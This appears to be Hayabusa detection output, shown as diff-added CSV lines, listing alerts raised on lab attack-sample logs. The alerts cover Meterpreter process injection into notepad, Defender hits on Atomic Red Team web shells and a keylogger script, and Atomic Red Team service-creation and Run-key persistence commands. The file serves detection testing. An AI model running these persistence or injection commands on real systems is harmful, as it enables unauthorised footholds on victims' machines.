+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
